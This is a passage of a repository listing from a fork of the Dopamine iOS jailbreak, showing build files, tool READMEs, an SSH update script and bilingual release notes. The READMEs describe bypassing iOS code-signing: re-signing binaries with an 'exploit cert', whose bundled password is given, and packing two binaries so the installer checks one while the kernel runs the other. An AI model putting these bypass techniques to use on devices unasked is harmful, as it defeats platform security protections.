25 | .target( 26 | name: "Exe2Driver", 27 | dependencies: ["SwiftUtils", "SwiftMachO"]) 28 | ] 29 | ) 30 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/README.md: -------------------------------------------------------------------------------- 1 | # Exe2Driver 2 | 3 | Exe2Driver can be used to convert a regular executable into a DriverKit driver which can then be launched using SpawnDrv/kexploitd. 4 | -------------------------------------------------------------------------------- /Tools/Makefile: -------------------------------------------------------------------------------- 1 | TARGETS=fastPathSign BuildVFS Exe2Driver installHaxx 2 | TARGETS_CLEAN=$(addsuffix _clean, $(TARGETS)) 3 | TARGETS_BUILD_CLEAN=$(addsuffix _build_clean, $(TARGETS)) 4 | 5 | all: $(TARGETS) 6 | clean: $(TARGETS_CLEAN) 7 | build_clean: $(TARGETS_BUILD_CLEAN) 8 | 9 | .PHONY: all clean build_clean 10 | 11 | $(TARGETS): FORCE 12 | @echo make -C $@ 13 | @$(MAKE) -C $@ 14 | 15 | $(TARGETS_CLEAN): FORCE 16 | @echo make -C $(@:_clean=) clean 17 | @$(MAKE) -C $(@:_clean=) clean 18 | 19 | $(TARGETS_BUILD_CLEAN): FORCE 20 | @echo make -C $(@:_build_clean=) build_clean 21 | @$(MAKE) -C $(@:_build_clean=) build_clean 22 | 23 | FORCE: ; 24 | -------------------------------------------------------------------------------- /Tools/Makefile.inc: -------------------------------------------------------------------------------- 1 | SWIFT_BUILD_ARGS=-c $(CONFIG) 2 | 3 | SWIFT_BUILD_ARGS_X86_64=$(SWIFT_BUILD_ARGS) -Xswiftc -target -Xswiftc x86_64-apple-macos12.0 4 | SWIFT_BUILD_ARGS_ARM64=$(SWIFT_BUILD_ARGS) -Xswiftc -target -Xswiftc arm64-apple-macos12.0 5 | 6 | all: $(TARGET) 7 | 8 | build_clean: 9 | rm -rf .build_x86_64 .build_arm64 10 | 11 | clean: build_clean 12 | rm -f $(TARGET) 13 | 14 | .PHONY: all build_clean clean 15 | 16 | .build_x86_64/$(CONFIG)/$(TARGET): FORCE 17 | swift build --build-path .build_x86_64 $(SWIFT_BUILD_ARGS_X86_64) 18 | 19 | 
.build_arm64/$(CONFIG)/$(TARGET): FORCE 20 | swift build --build-path .build_arm64 $(SWIFT_BUILD_ARGS_ARM64) 21 | 22 | $(TARGET): .build_x86_64/$(CONFIG)/$(TARGET) .build_arm64/$(CONFIG)/$(TARGET) 23 | lipo -create .build_x86_64/$(CONFIG)/$(TARGET) .build_arm64/$(CONFIG)/$(TARGET) -output $(TARGET) 24 | 25 | FORCE: ; 26 | -------------------------------------------------------------------------------- /Tools/fastPathSign/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /Packages 4 | /*.xcodeproj 5 | xcuserdata/ 6 | DerivedData/ 7 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 8 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=fastPathSign 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "fastPathSign", 8 | platforms: [ 9 | .macOS(.v11) 10 | ], 11 | products: [ 12 | // Products define the executables and libraries a package produces, and make them visible to other packages. 13 | .executable( 14 | name: "fastPathSign", 15 | targets: ["fastPathSign"]), 16 | ], 17 | targets: [ 18 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 19 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 
20 | .systemLibrary(name: "Security_Codesign"), 21 | .executableTarget( 22 | name: "fastPathSign", 23 | dependencies: ["Security_Codesign"]) 24 | ] 25 | ) 26 | -------------------------------------------------------------------------------- /Tools/fastPathSign/README.md: -------------------------------------------------------------------------------- 1 | # fastPathSign 2 | 3 | fastPathSign is a tool to re-sign MachO's with the fastPath exploit cert. 4 | 5 | # Prerequisites 6 | 7 | Make sure you imported the fastPath exploit certificate into your Keychain (Exploits/fastPath/arm.pfx, password: "password"). 8 | The certificate must be named "Pinauten PWN Cert". 9 | 10 | # Usage 11 | 12 | First ad-hoc sign the MachO, including the entitlements you need. 13 | Then run `fastPathSign ` to re-sign your MachO. This will keep the entitlements, identifier, etc. 14 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Sources/Security_Codesign/module.modulemap: -------------------------------------------------------------------------------- 1 | module Security_Codesign [system] { 2 | header "SecCodeSigner.h" 3 | } 4 | -------------------------------------------------------------------------------- /Tools/fastPathSign/fastPathSign: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Tools/fastPathSign/fastPathSign -------------------------------------------------------------------------------- /Tools/installHaxx/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /Packages 4 | /*.xcodeproj 5 | xcuserdata/ 6 | DerivedData/ 7 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 8 | -------------------------------------------------------------------------------- /Tools/installHaxx/Makefile: 
-------------------------------------------------------------------------------- 1 | TARGET=installHaxx 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/installHaxx/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftMachO", 6 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 7 | "state": { 8 | "branch": "master", 9 | "revision": "d433b349d7e69bb8fd5d18ea5cdbcd8b731ddf55", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "SwiftUtils", 15 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 19 | "version": null 20 | } 21 | } 22 | ] 23 | }, 24 | "version": 1 25 | } 26 | -------------------------------------------------------------------------------- /Tools/installHaxx/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "installHaxx", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .executable( 15 | name: "installHaxx", 16 | targets: ["installHaxx"]), 17 | ], 18 | dependencies: [ 19 | // Dependencies declare other packages that this package depends on. Both are requested by branch (`master`), not by version or revision; the commits actually resolved are the ones recorded in Package.resolved, so changes to that file deserve review. 20 | .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 21 | .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")) 22 | ], 23 | targets: [ 24 | // Targets are the basic building blocks of a package.
A target can define a module or a test suite. 25 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 26 | .executableTarget( 27 | name: "installHaxx", 28 | dependencies: ["SwiftUtils", "SwiftMachO"]), 29 | ] 30 | ) 31 | -------------------------------------------------------------------------------- /Tools/installHaxx/README.md: -------------------------------------------------------------------------------- 1 | # installHaxx 2 | 3 | Tool to combine two MachO's. When installing an iOS App containing an executable created by this tool, installd will validate the first MachO while the kernel will execute the second one. 4 | -------------------------------------------------------------------------------- /Tools/installHaxx/installHaxx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Tools/installHaxx/installHaxx -------------------------------------------------------------------------------- /jbupdate.sh: -------------------------------------------------------------------------------- 1 | DEVICE=iPhone13Pro.Remote 2 | 3 | ssh $DEVICE "rm -rf /var/mobile/Documents/Dopamine.tipa" 4 | scp ./Dopamine/Dopamine.tipa $DEVICE:/var/mobile/Documents/Dopamine.tipa 5 | ssh $DEVICE "/var/jb/basebin/jbctl update tipa /var/mobile/Documents/Dopamine.tipa" -------------------------------------------------------------------------------- /release.md: -------------------------------------------------------------------------------- 1 | ## 关于本次更新 2 | 3 | 这本质上是一个自用版本,发布的意思是「分享」。 4 | 5 | ### 1.1.10 - 20231030_234232 6 | 7 | 1. 更新上游代码至 `opa334/Dopamine:95f3ba0`。 8 | 2. 新功能开发中。 9 | 10 | ## 修改版的主要功能 11 | 12 | 1. 提供汉化(包括中国大陆、中国香港、中国台湾)。对,汉化作者是我(自豪)。 13 | 2. 可与官方版本共存。 14 | 3. 支持应用内更新越狱包。 15 | 4. 支持目录映射,并支持越狱后新增目录映射(而无需重启越狱;位于越狱后的设置中)。 16 | 5. 允许用户在越狱成功后点按「用户空间重启以完成越狱」,而不是自动重启。 17 | 6. 额外提供「软重启」、「重启」功能按钮。 18 | 7. 
提供重建越狱引导环境的功能(位于设置中)。 19 | 8. 提供「屏蔽更新」的功能,以屏蔽 Dopamine 在启动时检查更新。当然,你可能因此错过最新更新;虽然这通常不是什么大问题。 20 | 9. 提供「桥接心浪」的功能,以便以 XinA 的模式安装有根插件。 21 | 10. 在首次越狱和重建越狱时,自动安装正确版本的 ElleKit 和 PreferenceLoader。 22 | 11. 首页加入编译时间及系统启动时间,关于页加入编译版本。 23 | 24 | ------ 25 | 26 | ## About This Update 27 | 28 | This modification is designed to be used only by myself. 29 | 30 | ### 1.1.10 - 20231030_234232 31 | 32 | 1. Update upstream to `opa334/Dopamine:95f3ba0`. 33 | 2. New Feature: WIP... 34 | 35 | ## About this Mod 36 | 37 | 1. Offers Chinese translation (Mainland China, Hong Kong of China, Taiwan of China). 38 | 2. Can coexist with the official version. 39 | 3. Offers the ability to update over the air (OTA). 40 | 4. Supports bind-mounting paths, including adding bind mounts after jailbreaking (no need to reboot and re-jailbreak; find it on the settings page once jailbroken). 41 | 5. Allows users to reboot userspace by tapping a button, rather than rebooting automatically. 42 | 6. Offers ldrestart and reboot buttons. 43 | 7. In settings, users can enable "rebuild environment". 44 | 8. Provides a "block updates" feature to block Dopamine from checking for updates on startup. However, you may miss out on the latest updates as a result, although this is generally not a significant issue. 45 | 9. Provides the "Bridge to XinA" feature to facilitate the installation of rooted plugins using the XinA mode. 46 | 10. Installs the correct ElleKit and PreferenceLoader when jailbreaking for the first time. 47 | 11. Adds the compile time and system uptime to the first page, and the compile version to the about page. 48 | 49 | ------ 50 | --------------------------------------------------------------------------------